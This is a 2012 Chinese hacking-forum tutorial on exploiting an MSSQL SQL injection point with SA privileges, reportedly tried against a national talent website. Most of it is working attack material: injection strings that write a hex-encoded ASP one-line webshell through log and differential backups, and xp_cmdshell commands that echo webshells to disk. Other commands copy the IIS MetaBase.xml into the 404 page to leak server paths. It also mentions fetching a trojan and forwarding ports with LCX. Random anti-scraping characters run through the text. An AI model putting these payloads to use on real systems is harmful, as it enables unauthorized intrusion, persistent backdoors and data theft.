找回密码
 立即注册
查看: 2697|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
( s# k% M* }5 R# o, [* u, f+ o: Y2 B0 C; H* }0 Q7 J0 j

3 n$ x; N4 \- K8 P; |7 u0 H: L                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
4 q* L  I9 ]5 y: o1 E7 P. E& b, W5 U" y4 O7 ]1 P, K8 _4 [
                                                                 
! ~7 f1 W. d0 F* N                                                                 
% ~3 x0 u$ S  c8 z) f( J: E1 E" v                                                                  论坛: http://www.90team.net/0 H  ~/ m, B1 [; B, m1 a
$ h3 y7 o; Z0 B/ }, k* y. C: `
+ y. A9 @5 M; c$ @7 |- R% q9 `* b; N

( Z# q5 p' l6 a+ {% n$ d友情检测国家人才网
; f- J; e* J$ L# m4 q5 B# l5 [$ E. d# E3 Z; z; `- x( O
2 `/ }$ w% N% |4 y
内容:MSSQL注入SA权限不显错模式下的入侵
5 b- Z! f( v9 `9 g" U& U* ~- b4 r1 \0 P# b1 A, e7 H
' L4 c4 g) |5 Q; g
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
9 {, l6 A% j  Y
* x7 b$ }2 }' n7 s, ~我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
6 _% v- m0 c: M' q1 K1 k2 m& J% q& O2 f7 ~) B! p
5 e6 F9 l8 _# z& k' _& ]* H3 s6 ^
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。: }1 F  x- `/ t; H( t. |( L

5 S, @1 t6 S  t. c8 y+ F& k思路:" H7 a- A4 B. E4 z
+ U/ H& w/ D% X
首先:
+ M. P+ r) l1 Q. \! ~) Y( \' u1 {! J, y. F1 J  f& C
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
! R+ L& n. V( M0 P! U& ?. V, o
' p- [& J0 m. a1.日志备份获得Webshell4 H7 ?9 x1 @  P3 {2 s) k

- z# M8 |+ @3 t( O2.数据库差异备份获得Webshell
3 j) U  X! e4 c5 o5 b
5 [2 Y* W4 k  \/ X0 _6 C( ~* u4.直接下载免杀远控木马。
! K2 f. W5 A% n' }, d- M* |# X3 M$ D) {9 k! S! U5 g
5.直接下载LCX将服务器端口转发出来  O# ~" q$ t" D& u$ a1 b0 W& E

1 V0 z. }$ D- I! |8 ~" [5 z+ n! w6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。6 n% L% S7 ^9 T: |3 w8 d

& w% I; [( y0 x0 c6 r2 b4 I/ V, G4 ^0 n# D* H# A3 K. X

" @' |0 x- o. S" ~  P9 u在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, + ^( x  s" i. h8 E; w6 H
$ k9 h4 x0 A3 k  D* \
我直接演示后面一个方法
! `* h" q+ C+ N. P' N5 s$ y# d5 f- ^9 T  V
' Z* H( x/ M1 g$ A6 _
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
8 B. b8 w; D6 n* {1 P  v+ b1 E1 f. S; r
) N. v; j3 ]. z+ v  G6 d- |8 c* T  P& W

3 B0 H) N+ b  M; S. a8 g* K2 M% b8 a- {& o4 V* y, N
◆日志备份:- Z% d, M6 ^* i6 @7 i9 u
3 a2 i) K) H: `5 q) W% x

& `' O8 V0 Q7 y; a1. 进行初始备份, e8 q  i/ }, k% b' ?
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
' w6 K. J8 S+ h, o; ^
0 L( c" u+ I0 D2 P# X2. 插入数据6 ?; z( A1 g! J: Y) t& Z1 t) R- r
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
9 |* I3 o% N' t& I, h0 K! |) \
# @: s- q" i$ x+ ^0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>2 Z3 Q1 j7 Y% d" y  M+ V2 ^
  
- i+ M# ^# _7 T' V3. 备份并获得文件,删除临时表
" F( n; ^& Y3 Y;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--$ x8 m! Z, o4 z! p4 D
& G8 D9 u3 V9 j0 |' m; n- b

3 M$ m9 @+ \7 f9 P
- s$ \: U: d5 r( S( r* ?+ x2 w◆数据库差异备份
1 h$ Z! v/ [: U" V
: \6 X0 o0 i" K! b% F(1. 进行差异备份准备工作
' `2 b4 ^  a+ Q1 J/ y7 N: j# ]$ n# h# Y) Y* H# C) X
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
8 s  @4 O3 H- ?+ V6 ]
4 {4 g  U% [  a9 N9 f. _4 g  V上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码, p' R; _) B0 i% ^
( g4 ^# t/ _  w6 ]. y6 ?
3 E6 Y1 C' s) x! s* N5 A7 w
(2. 将数据写入到数据库
3 [8 d0 Y  l! b! ^% @;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
7 U5 i6 c% z* a) f# p, Z, }5 P, O/ J2 ~; T! p; v. U
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
) ?3 L! K- e5 X3 n# X* Z1 [
  _& r& d8 V  Y% m) a! y/ P3. 备份数据库并清理临时文件: T  u8 s/ l3 R  `0 [$ c

. W/ h( a  o/ O# f;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--4 z& t9 ?* H, J2 u" X

7 G" Y% C8 ~& b  k* z0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
, B$ a+ H! B2 |2 z" ?/ X) Z: D
, M: }+ i* }& t  ?1 p8 }6 G: ?% l' l3 E) o, L5 W) r4 p

; z" A0 X# y: T- Y) a+ A用^转义字符来写ASP(一句话木马)文件的方法:   
# z+ b1 U" G  u  x$ p, y, M' D7 H* p' B0 k# y
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
7 ]+ h7 B' f# n+ J. V: }: z' N5 t* T) `! }% T  U
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
7 n  [2 s6 v. e9 k9 U2 d2 c, r# |. s. s, B
读取IIS配置信息获取web路径
1 }5 t6 j# L2 D9 b" Y
9 ]1 j) b! z. p) W     * T/ ?4 O! I0 v4 h0 o
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--2 T7 \4 r# c. F# N' {

3 Z( z6 ]' c/ F' V执行命令+ N. n* a8 z, R3 B4 ~  f/ ]
     8 f5 h# O# j1 Q% p2 ?+ `* p* A7 Z
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--$ B0 E4 B' U7 j" P, W
& K$ o/ \3 j/ n+ ?& {  ]4 }& z
  O5 M' m0 Q; T2 ^! _6 ^/ }
! S4 Q6 |6 o  v& Z( @  @
( Z3 ~5 s: f+ I+ R3 X

, ]! D  V( P, `, r/ }- M( t: }  R, l& T+ I& l7 ^- t4 k
5 `, E$ \, z  m6 l, ^
2 e6 @" N( `5 A$ }7 N6 S0 g
; z$ D! O( k& V! h
. H; L! u2 A# P1 N0 E+ p) A

! @1 R7 O2 f/ D, D0 C6 W% ^1 ]: Z$ m# t6 S' g6 K7 g
1 f9 i" L7 y" c6 [" p" c  R

, P. k' |% \" o1 l
; g* J: g3 L  |& r  J
. d8 U+ x  n( j, o1 [6 f! c/ p$ F3 y& f

( n( Q8 c( [% Q; H6 ^
" J( X9 a. `5 }" t$ U2 C- v% I4 r! I/ o4 W" Q7 @% k

6 |5 K  A, n, r9 X) K' q0 @: e6 t+ W) N7 |" j  L

! ~1 w. U3 m$ I/ N+ {3 K( g$ q5 Y( A( ~" N

- x  _; X0 i9 S: r" s2 Q5 P9 n, b) w6 E6 j4 Q* K

, N2 H5 o9 x- U. S7 }( a5 n9 R) A& x
3 b& q4 @$ z% m  d  H2 J+ \
( t) r# O1 m; J1 O$ Q1 E; l1 E
& L# L9 g. r1 ^3 K3 v+ M4 m+ F
1 d- C) `* k0 s& V6 t: l0 ?4 t0 R, f( ~; }; |

9 j- Y' a: C; ~2 e9 D5 }& k5 f% B) v# Q' S6 E4 x6 k

: U5 N9 B  w' z# @+ x: ^* L
. w; t1 e, }. q6 j& q4 `' H+ b$ P$ b- b' x/ E& b! |

  l6 W) h6 E% A" P) o1 L
: w3 k+ |+ \* }# a7 B" Y; y; w
' M7 W% N2 j& {* Z6 p+ R2 @. `4 t
3 V* {1 n3 {2 ^! a2 e  h
& Q6 D3 W( }  Q+ `

; W- n% `. \  e( @" [* U& j+ z6 I" P# i, C4 \1 l: v, b
$ b$ ]5 N3 B+ a. t, D) N7 @

$ \% }/ C# c9 p( Z! B! r2 c) ~% P' A3 q5 `* E# @. i7 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表